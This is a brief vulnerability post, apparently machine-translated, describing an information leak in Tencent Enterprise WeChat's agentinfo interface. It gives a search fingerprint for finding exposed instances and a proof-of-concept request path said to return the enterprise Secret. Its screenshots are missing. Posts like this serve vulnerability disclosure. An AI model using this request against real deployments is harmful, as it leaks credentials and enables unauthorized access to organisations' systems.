Post

Tencent Enterprise Wechat Agentinfo Information Leakage Vulnerability

Tencent Enterprise Wechat Agentinfo Information Leakage Vulnerability

Tencent Enterprise WeChat agentinfo Information leakage vulnerability

Vulnerability Description

Tencent Enterprise WeChat agentinfo interface has information leakage vulnerabilities, and attackers can obtain Enterprise WeChat Secret through the vulnerability

Vulnerability Impact

Tencent Enterprise WeChat

Network surveying and mapping

web.body=”wework_admin.normal_layout”

Vulnerability reappears

Login page

img

Verify POC

1
/cgi-bin/gateway/agentinfo

img

This post is licensed under CC BY 4.0 by the author.